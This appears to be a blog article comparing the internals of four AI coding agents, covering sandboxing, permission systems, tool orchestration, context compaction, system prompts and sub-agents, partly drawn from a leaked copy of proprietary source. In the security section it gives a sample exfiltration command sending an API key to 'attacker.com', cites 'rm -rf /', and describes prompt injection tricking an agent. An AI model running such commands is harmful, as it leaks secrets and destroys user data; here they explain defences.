I expected the differences between AI coding agents to be in how they call the LLM. They're not. The API call is trivial -- a streaming HTTP request with a JSON payload. Every agent does it essentially the same way.
What makes these tools different -- what makes them products -- is everything wrapped around that API call: the 40 tools that give the AI hands, the permission systems that keep it from breaking things, the compaction strategies that prevent it from forgetting what it's doing, and the prompt engineering that shapes how it thinks.
I cloned the source code for all four major AI coding agents -- Claude Code (from a leaked copy of Anthropic's proprietary source), OpenAI's Codex CLI, Cline (the popular VS Code extension), and OpenCode (an open-source Go CLI) -- and read through their internals. What I found reveals four competing philosophies about a fundamental question: how much should you trust an AI with your codebase?
Here's what we're looking at:
| | Claude Code | Codex CLI | Cline | OpenCode |
|---|---|---|---|---|
| Maker | Anthropic | OpenAI | Community (OSS) | Community (OSS) |
| Language | TypeScript | Rust + TypeScript | TypeScript | Go |
| Interface | CLI + SDK + IDE | CLI (Rust TUI) | VS Code extension | CLI (TUI) |
| LLM Support | Claude only | OpenAI only | 50+ providers | Anthropic + OpenAI |
| Codebase | ~500K lines | ~80K lines | ~150K lines | ~30K lines |
| License | Proprietary (leaked) | Apache 2.0 | Apache 2.0 | MIT |
| Dimension | Claude Code | Codex | Cline | OpenCode |
|---|---|---|---|---|
| Security | Permission prompts + hooks | OS-level sandbox | UI approval + auto-approve | Channel-based approval |
| Tool concurrency | Parallel reads, serial writes | Serial (sandboxed) | Serial | Serial |
| Context mgmt | Multi-strategy compaction | Auto-compaction + truncation | Sliding window + summary | SQLite sessions + summary |
| Sub-agents | Full multi-agent with teams | Full multi-agent + guardian | Sub-agent system | Task sub-agents |
| File editing | Search-and-replace | Unified diff patch | Full rewrite or diff | Line-range edit |
| Session persistence | JSON transcript files | JSONL with session resume | VS Code workspace state | SQLite database |
| UI framework | React/Ink | ratatui (Rust) | VS Code Webview | Bubbletea |
The numbers don't tell the whole story. Let me walk through what actually matters.
The most revealing difference between these four tools isn't a feature. It's a philosophy.
Each tool answers that trust question at a different point on a spectrum running from constant supervision to full autonomy:
- Watch every move and approve each action (OpenCode, Cline in default mode)
- Set rules up front -- "you can run git commands freely, but ask before touching anything outside /src" (Claude Code's permission system)
- Enforce isolation at the OS level -- constrain all commands to a sandboxed process the kernel controls (Codex)
- Grant full access and hope for the best (any tool in "YOLO mode")
That position shapes every architectural decision.
Codex is the only tool among the four that provides real process-level isolation. When the AI runs a shell command, that command executes inside an OS-level sandbox:
- macOS: Seatbelt sandbox profiles restrict filesystem access
- Linux: Landlock LSM + bubblewrap containers isolate the process
- Windows: Restricted process tokens limit capabilities
The sandbox enforces three tiers: read-only (can look but not touch), workspace-write (can modify files within the project directory only), and danger-full-access (no restrictions, requires explicit opt-in). Network access is controlled separately -- in the default mode, commands cannot make network requests at all.
If the AI decides to run `rm -rf /`, the operating system itself blocks the command. Not a permission prompt. Not a warning dialog.
The kernel says no.
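Under those tiers, the policy check itself is simple. A minimal TypeScript sketch, assuming a policy shape of my own invention (Codex's real enforcement lives in the OS, not in application code like this):

```typescript
// Illustrative model of the three sandbox tiers described above.
// In Codex the kernel enforces this; here it's just a predicate.
type SandboxMode = "read-only" | "workspace-write" | "danger-full-access";

interface SandboxPolicy {
  mode: SandboxMode;
  writableRoots: string[]; // e.g. the project directory
  allowNetwork: boolean;   // off in the default mode
}

function canWrite(policy: SandboxPolicy, path: string): boolean {
  if (policy.mode === "danger-full-access") return true;
  if (policy.mode === "read-only") return false;
  // workspace-write: writes are allowed only under a writable root
  return policy.writableRoots.some((root) => path.startsWith(root + "/"));
}
```

The point of the real design is that this check cannot be bypassed by the model: even a command the agent was tricked into running hits the same kernel-level wall.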
Sandboxing isn't a complete answer, though. It prevents filesystem violations, but an approved network call could still exfiltrate data -- `curl https://attacker.com?token=$API_KEY` goes right through if network access is permitted. Security is defense in depth, not a single mechanism.
The tradeoff is friction. Sandboxed commands are slower. Some legitimate operations (installing packages, accessing APIs) require elevated permissions. The sandbox policy gets injected directly into the system prompt so the model knows its constraints before trying:
```
Filesystem sandboxing: sandbox_mode is `workspace-write`:
The sandbox permits reading files, and editing files in
`cwd` and `writable_roots`. Editing files in other
directories requires approval.
```
It tells the AI what it can't do before it tries, so it doesn't waste turns attempting something the sandbox would block anyway.
Claude Code has no process-level sandbox. Instead, it relies on a multi-layered permission system -- like a bouncer checking IDs rather than a locked door:
- Permission mode -- `default` (ask before writes), `plan` (show full plan first), `bypassPermissions` (approve everything)
- Hook evaluation -- user-configured shell commands that run before each tool call
- Rule matching -- wildcard patterns like `Bash(git *)` and `FileEdit(/src/*)`
- User prompt -- if no rule matches, ask the user
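A hedged sketch of how such wildcard rules can be matched -- the real matcher in Claude Code is surely more involved:

```typescript
// Glob-to-regex matching in the style of Bash(git *) / FileEdit(/src/*).
// Escape regex metacharacters first, then treat * as "match anything".
function ruleMatches(pattern: string, toolCall: string): boolean {
  const escaped = pattern.replace(/[.+?^${}()|[\]\\]/g, "\\$&");
  const regex = new RegExp("^" + escaped.replace(/\*/g, ".*") + "$");
  return regex.test(toolCall);
}
```

A rule like `Bash(git *)` then matches `Bash(git status)` but not `Bash(rm -rf /)`, so git commands flow through freely while everything else falls back to the user prompt.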
The Bash tool alone has an entire security subsystem: `bashSecurity.ts` validates commands for injection patterns, `sedValidation.ts` prevents `sed` from being used to bypass the file editing permission model, and `destructiveCommandWarning.ts` flags dangerous operations like `rm -rf` or `git push --force`.
The philosophy is: the AI should be powerful but supervised. A sophisticated permission system lets expert users grant broad access while keeping guardrails for everyone else. The risk is that permission prompts are only as good as the human reading them -- and a sufficiently crafted prompt injection (say, a malicious comment in a file the AI reads) could trick the model into requesting actions that look benign but aren't. Unlike Codex's kernel-enforced sandbox, Claude Code's safety depends on human judgment at every gate.
Cline runs inside VS Code, which shapes its entire security model. Before the AI edits a file, you see a diff preview. Before it runs a command, you see the command. You click approve or deny. It's the most transparent model -- you always know exactly what's about to happen.
There's a granular auto-approval system where you can approve categories of actions (read files: yes, execute bash: no, write files: ask me). And there's a "YOLO mode" toggle that approves everything. The name is honest about the risk, but it reduces security to a single checkbox -- users who enable it may underestimate the actual danger of full autonomy.
Cline also has a CommandPermissionController that flags dangerous shell operators like `>`, `|`, and `&&`. But fundamentally, the security model is: trust the human to review what the AI wants to do.
OpenCode uses Go channels to create a clean blocking-approval pattern. When the agent needs permission, it creates a channel, publishes the request to the TUI, and blocks until the user responds. Persistent session-level approvals mean you don't get asked the same question twice.
It's the simplest model: ask, wait, proceed. No sandbox, no rule engine, no hooks. Just a channel and a human.
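The same ask-wait-proceed flow translates naturally out of Go. A TypeScript sketch using a pending Promise in place of a channel (class and method names are mine, not OpenCode's):

```typescript
// Blocking-approval pattern: the agent awaits a Promise that only the
// UI can resolve, mirroring a Go channel receive.
class ApprovalGate {
  private pending = new Map<string, (approved: boolean) => void>();
  private granted = new Set<string>(); // session-level "don't ask again"

  // Called by the agent; blocks (via await) until the user responds
  request(action: string): Promise<boolean> {
    if (this.granted.has(action)) return Promise.resolve(true);
    return new Promise((resolve) => this.pending.set(action, resolve));
  }

  // Called by the UI when the user clicks approve/deny
  respond(action: string, approved: boolean, remember = false): void {
    if (approved && remember) this.granted.add(action);
    this.pending.get(action)?.(approved);
    this.pending.delete(action);
  }
}
```

Persistent approvals fall out naturally: once `remember` is set, subsequent requests for the same action resolve immediately without ever reaching the UI.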
The AI is only as capable as the tools it can use. The differences are in how many tools each system provides and how it coordinates them.
Claude Code has the largest tool inventory: file read, file write, file edit, glob search, grep search, bash execution, web fetch, web search, notebook editing, MCP integration, LSP queries, sub-agent spawning, team creation, skill loading, and more.
The orchestration layer is particularly clever. It partitions tool calls into batches based on their nature:
- Read-only tools (file reads, searches) run concurrently, up to 10 in parallel
- Write tools (file edits, bash commands) run serially
So when the AI wants to read 10 files and then edit one, the 10 reads happen simultaneously, then the edit runs alone. For a typical coding task that involves reading many files before making a change, this parallel execution saves real time.
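A minimal sketch of that partitioning, with invented names (this is not Claude Code's actual orchestration code):

```typescript
// Partition tool calls: read-only calls run concurrently in chunks of
// up to 10; write calls run strictly serially, after all reads finish.
async function runBatch(
  calls: { readOnly: boolean; run: () => Promise<string> }[]
): Promise<string[]> {
  const results: string[] = new Array(calls.length);
  const indexed = calls.map((c, i) => ({ c, i }));
  const reads = indexed.filter((x) => x.c.readOnly);
  const writes = indexed.filter((x) => !x.c.readOnly);

  // Reads: concurrent, capped at 10 in flight
  for (let start = 0; start < reads.length; start += 10) {
    const chunk = reads.slice(start, start + 10);
    await Promise.all(chunk.map(async ({ c, i }) => { results[i] = await c.run(); }));
  }
  // Writes: one at a time, preserving order
  for (const { c, i } of writes) {
    results[i] = await c.run();
  }
  return results;
}
```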
One optimization I haven't seen elsewhere: a `StreamingToolExecutor` starts executing tools while the model is still generating its response. If the model emits a complete tool call before it's done talking, execution begins immediately rather than waiting for the full response to finish. On a multi-tool response, this can shave seconds off wall-clock time -- the file reads are already done by the time the model finishes explaining what it's about to do.
Superficial comparisons claim Codex has only a handful of tools. That's wrong. The Rust core defines 25+ tool handlers including shell execution, code patching (in both JSON and freeform formats), directory listing, a JavaScript REPL, multi-agent orchestration (spawn, resume, wait, close, send-message, list, assign-task), image viewing, MCP integration, and even batch agent jobs via `spawn_agents_on_csv`.
Codex's `apply_patch` tool deserves special attention. Instead of Claude Code's search-and-replace or Cline's full-file rewrites, Codex uses unified diff format. The model generates a patch, and the tool applies it.
This isn't just about token efficiency (though it is more efficient). Unified diff is a semantic design choice. It forces the model to reason about context lines, creating an implicit incentive for surgical edits rather than wholesale rewrites. It also makes the output portable -- AI-generated patches can be reviewed with standard diff/patch utilities, piped into code review tools, or applied by hand. Search-and-replace can silently match in the wrong location if a pattern appears multiple times; diffs are anchored to specific positions in specific files.
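For concreteness, here's what a unified-diff edit looks like (a hypothetical patch, not one from Codex):

```diff
--- a/src/greet.ts
+++ b/src/greet.ts
@@ -1,3 +1,3 @@
 function greet(name: string) {
-  return "Hello " + name;
+  return `Hello ${name}`;
 }
```

The unchanged context lines anchor the edit: if the surrounding code has drifted, the patch fails loudly instead of silently matching the wrong occurrence.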
Every tool goes through the sandbox system. The sandbox requirements are declared per-tool, so the system knows which permissions each tool needs before it executes.
Cline's most interesting tool trick is dual-mode definitions. Each tool has variants for different model families:
For older models that don't support function calling, tools are rendered as XML in the system prompt:
```xml
<write_to_file>
<path>src/app.ts</path>
<content>file contents here</content>
</write_to_file>
```

For newer Anthropic and OpenAI models, the same tools use native function calling APIs. This lets Cline support models that range from GPT-5 down to local Ollama models that can only parse XML.
Cline also has browser automation via Puppeteer -- a capability that lets the AI navigate web pages, click buttons, fill forms, and take screenshots. If you're building a web app and want the AI to actually test it in a browser, Cline is the only tool that does this natively.
OpenCode has a smaller set (Bash, Edit, Fetch, Glob, Grep, LS, View, Patch, Write, Diagnostic, Agent) but with one standout: the Diagnostic tool. It queries running LSP (Language Server Protocol) servers for code diagnostics -- compiler errors, type mismatches, unused imports.
Both Claude Code and OpenCode have LSP integration, but OpenCode makes it a first-class tool the agent can invoke directly. The agent doesn't need to run a build command and parse the output to find errors; it can ask the language server directly. This gives it IDE-level understanding of the codebase.
LLMs forget. They have fixed context windows -- typically 128K to 200K tokens -- and a long coding session can easily overflow that. When it happens, the AI starts losing track of earlier decisions, file contents it read, and the overall plan. Each tool handles this differently.
Claude Code throws everything at the problem:
- Proactive compaction -- monitors token count and summarizes older messages before hitting the limit
- Reactive compaction -- catches `prompt_too_long` errors from the API and compacts retroactively
- Snip compaction -- in SDK/headless mode, truncates at defined boundaries to bound memory in long sessions
- Context collapse -- a feature-flagged system that compresses verbose tool results mid-conversation without full compaction
The compaction produces a "compact boundary" marker. Everything before the boundary is replaced with a summary. The system is careful about persistence -- transcript files handle boundary relinks so `--resume` works correctly after compaction, even if the process was killed mid-turn.
There's also an LRU file state cache (100 files, 25MB) that tracks file contents across turns, preventing redundant re-reads.
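An LRU cache with exactly those limits can be sketched with a `Map`, whose insertion order doubles as recency order. The class shape here is my assumption, not the leaked implementation:

```typescript
// LRU file cache: evict least-recently-used entries once either the
// file-count cap (100) or the byte cap (25 MB) is exceeded.
class FileCache {
  private entries = new Map<string, string>(); // insertion order = recency
  private bytes = 0;
  private maxFiles: number;
  private maxBytes: number;

  constructor(maxFiles = 100, maxBytes = 25 * 1024 * 1024) {
    this.maxFiles = maxFiles;
    this.maxBytes = maxBytes;
  }

  get(path: string): string | undefined {
    const content = this.entries.get(path);
    if (content !== undefined) {
      // Re-insert to mark as most recently used
      this.entries.delete(path);
      this.entries.set(path, content);
    }
    return content;
  }

  set(path: string, content: string): void {
    if (this.entries.has(path)) {
      this.bytes -= this.entries.get(path)!.length;
      this.entries.delete(path);
    }
    this.entries.set(path, content);
    this.bytes += content.length;
    // Evict from the front of the Map (least recently used) until under limits
    while (this.entries.size > this.maxFiles || this.bytes > this.maxBytes) {
      const oldest = this.entries.keys().next().value as string;
      this.bytes -= this.entries.get(oldest)!.length;
      this.entries.delete(oldest);
    }
  }
}
```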
Codex's context management is more capable than it looks from the outside. The Rust core includes `compact.rs` and `compact_remote.rs` with pre-turn compaction, mid-turn compaction, and remote compaction strategies. A summarization prompt template generates concise context summaries, and token-aware truncation via the output truncation utilities keeps tool results from dominating the context window.
Cline takes a pragmatic approach. It calculates usable context per model (200K Claude models get a 160K buffer; 128K models get 98K). When approaching the limit, a `CondenseHandler` asks the LLM itself to summarize the conversation -- capturing intent, modified files, code snippets, pending tasks, and next steps. It's meta-prompting: the AI summarizes its own work so it can continue from the summary.
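The budget arithmetic from that paragraph, sketched directly (only the 160K and 98K figures come from the source; the fallback ratio for unlisted models is my assumption):

```typescript
// Per-model usable context, using the figures cited above:
// 200K-window Claude models get a 160K budget; 128K-window models get 98K.
const USABLE_TOKENS: Record<number, number> = {
  200_000: 160_000,
  128_000: 98_000,
};

function shouldCondense(contextWindow: number, usedTokens: number): boolean {
  // Fallback for unlisted models: assume ~75% of the window is usable
  const budget = USABLE_TOKENS[contextWindow] ?? Math.floor(contextWindow * 0.75);
  return usedTokens >= budget;
}
```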
OpenCode stores everything in SQLite -- sessions, messages, token counts, costs. Sessions can have sub-sessions (for tool calls) and auto-generated titles. The `SummaryMessageID` field enables conversation summarization, though the compaction is simpler than the others.
This is where having the actual source code matters most. You can't reverse-engineer a system prompt from the outside. How these tools instruct the LLM reveals their design philosophy more than any other component.
Claude Code's system prompt is assembled from ~15 composable functions, each generating a section: identity, system rules, coding style, destructive action safety, tool usage guidance, tone, output efficiency, environment info, memory, MCP instructions.
Three patterns stand out:
The cache boundary. A marker called `__SYSTEM_PROMPT_DYNAMIC_BOUNDARY__` splits the prompt into two halves. Everything above is static -- the behavioral instructions that are the same for every user -- and gets cached with `scope: 'global'` in the Anthropic API. Everything below is per-session (your CLAUDE.md files, your MCP servers, your environment). This means the ~3,000 tokens of behavioral rules are cached and reused across all users globally, saving on API costs at scale.
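A sketch of the split as plain string assembly -- only the boundary marker name comes from the source; the functions and section contents are illustrative:

```typescript
// Everything above the boundary is identical for every user and can be
// cached globally; everything below is per-session.
const BOUNDARY = "__SYSTEM_PROMPT_DYNAMIC_BOUNDARY__";

function assemblePrompt(staticSections: string[], dynamicSections: string[]): string {
  return [...staticSections, BOUNDARY, ...dynamicSections].join("\n\n");
}

function cacheablePrefix(prompt: string): string {
  // Only this half would get the global cache scope in the API call
  return prompt.slice(0, prompt.indexOf(BOUNDARY));
}
```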
Numeric length anchors. Instead of saying "be concise," the internal prompt says:
```
Length limits: keep text between tool calls to <=25 words.
Keep final responses to <=100 words unless the task
requires more detail.
```
An internal source code comment references "~1.2% output token reduction vs qualitative 'be concise'" from A/B testing. That's internal company data, not peer-reviewed research, but it suggests Anthropic treats prompt wording like ad copy -- specific numbers outperform vague instructions, and they're measuring the difference.
Internal vs. external prompts. A `process.env.USER_TYPE === 'ant'` check throughout the codebase gives Anthropic's internal engineers different prompts. Internal users get: "If you notice the user's request is based on a misconception, say so" and "Never claim 'all tests pass' when output shows failures." There are also A/B test markers throughout: `@[MODEL LAUNCH]: capy v8 thoroughness counterweight (PR #24302) -- un-gate once validated on external via A/B`. The leaked source is a window into how Anthropic iterates on prompt engineering in production.
Codex's cleverest prompt idea is injecting the current sandbox policy directly into the system prompt. The model is told exactly what it can and cannot do before it tries. This reduces wasted turns where the model attempts something the sandbox would block.
Cline uses a PromptRegistry with model-family variants. The same conceptual instruction renders differently for Claude, GPT-5, Gemini, and generic models. This is necessary overhead when supporting 50+ providers -- each model responds differently to the same phrasing.
OpenCode takes a simpler approach -- different base prompts for Anthropic and OpenAI models, selected at runtime based on the configured provider. The prompts include instructions for OpenCode.md (their equivalent of CLAUDE.md) and LSP integration guidance.
All four tools can now spawn sub-agents -- separate AI instances that work on sub-problems independently. The implementations vary wildly.
Claude Code has the richest multi-agent system among the four:
- `AgentTool` spawns sub-agents with their own `QueryEngine` instances and filtered tool sets
- Agents can run foreground (blocking) or background (async, with notification on completion)
- `SendMessageTool` enables inter-agent communication
- `TeamCreateTool` spawns multiple agents as a coordinated team
- Agents can get their own git worktrees -- filesystem-level isolation so they don't step on each other's changes
- A "fork" mode where the sub-agent keeps its tool output out of the parent's context (protecting the parent from context bloat)
- Auto-background after 120 seconds to prevent sub-agents from blocking indefinitely
The system prompt explicitly prevents infinite delegation: "If you ARE the fork -- execute directly; do not re-delegate."
Codex has a more extensive multi-agent system than it's usually given credit for. The Rust core includes full agent lifecycle management: `spawn_agent`, `resume_agent`, `wait_agent`, `close_agent`, `send_message`, `list_agents`, and `assign_task`. There's even `spawn_agents_on_csv` for batch agent jobs.
On top of this, Codex has a `guardian_subagent` -- a separate AI that reviews tool calls for policy compliance. Think of it as a security reviewer that runs alongside the main agent, catching dangerous actions before they execute. When the guardian is uncertain, it escalates to the user.
Cline has a sub-agent system built around `SubagentRunner`, `SubagentBuilder`, and `SubagentToolHandler`, with configurable agent definitions loaded via `AgentConfigLoader`. Sub-agents can be defined and spawned for specific tasks.
OpenCode supports task sub-agents that get their own tool sets and sessions stored as child records in SQLite. Simpler than Claude Code's or Codex's systems, but functional.
Nobody talks about this enough: Claude Code only works with Claude. Codex only works with OpenAI models.
If you build your workflow around Claude Code, you're locked into Anthropic's pricing and availability. Same for Codex with OpenAI. If either company raises prices, degrades quality, or suffers an outage, you have no fallback.
Cline is the escape hatch. Its 50+ provider support means you can switch models -- or use local models via Ollama -- without changing your workflow. The tradeoff is that multi-provider support adds complexity and the experience is inevitably less polished than a tool optimized for a single provider.
OpenCode splits the difference: it supports both Anthropic and OpenAI, giving you a choice between the two largest providers without the sprawl of 50+ integrations.
For team adoption, this matters more than any technical comparison. The best architecture is irrelevant if the company changes its pricing model.
The tool system is the product. Claude Code has 500K lines of code; the actual API call is maybe 200 of them. Everything else is the harness -- and the harness is where the differentiation happens.
Security reflects different threat models, not a linear scale. Codex provides OS-enforced isolation. Claude Code provides user-configurable permission rules. Cline prioritizes human oversight. None is universally "more secure" -- each optimizes for different use cases and different levels of user expertise. But as these tools gain autonomy, all of them will need to get better here. Permission prompts don't scale to agents that run overnight.
Multi-agent is where the hard engineering problems are. All four tools now support sub-agents in some form. The challenges -- shared state, merge conflicts, context isolation, preventing infinite delegation -- are the same challenges distributed systems have always faced. The team that solves multi-agent coordination cleanly wins.
Context management separates toys from tools. The difference between an agent that works for a 10-minute task and one that works for a 10-hour session is entirely about how it handles forgetting. Claude Code's four-layer compaction, Codex's Rust-powered truncation, Cline's self-summarization -- they're all fighting the same enemy.
The survivors will combine Codex's security model, Claude Code's orchestration, Cline's flexibility, and OpenCode's LSP integration. Whether that convergence happens through competition or open-source collaboration is the interesting question.
For maximum capability today: Claude Code. Deepest tool system, best context management, most powerful multi-agent orchestration. The tradeoff is vendor lock-in to Anthropic and a complexity level that's hard to debug when things go wrong.
For security-sensitive environments: Codex. OS-level sandboxing is a fundamentally different safety guarantee than permission prompts. If you're working on a codebase where a runaway command could cause real damage, Codex is the only tool that provides genuine containment. Its multi-agent and compaction capabilities are better than people think.
For maximum flexibility: Cline. If you want to use whatever model is best right now -- or switch tomorrow without changing your workflow -- Cline is the only option. Browser automation and sub-agents are bonuses. The tradeoff is it only runs inside VS Code.
For understanding and customization: OpenCode. At 30K lines of clean Go, you can read the entire codebase in a day. If you want to fork a coding agent and build on it, start here. LSP integration and SQLite sessions are well-engineered foundations.
Right now, your choice of model often forces your choice of harness -- Claude Code for Claude, Codex for GPT. That coupling will weaken as models commoditize and the harness features (multi-agent, security, context management) become the real differentiators. The shift is already visible: Cline's 50+ provider support exists precisely because some users value harness flexibility over model lock-in.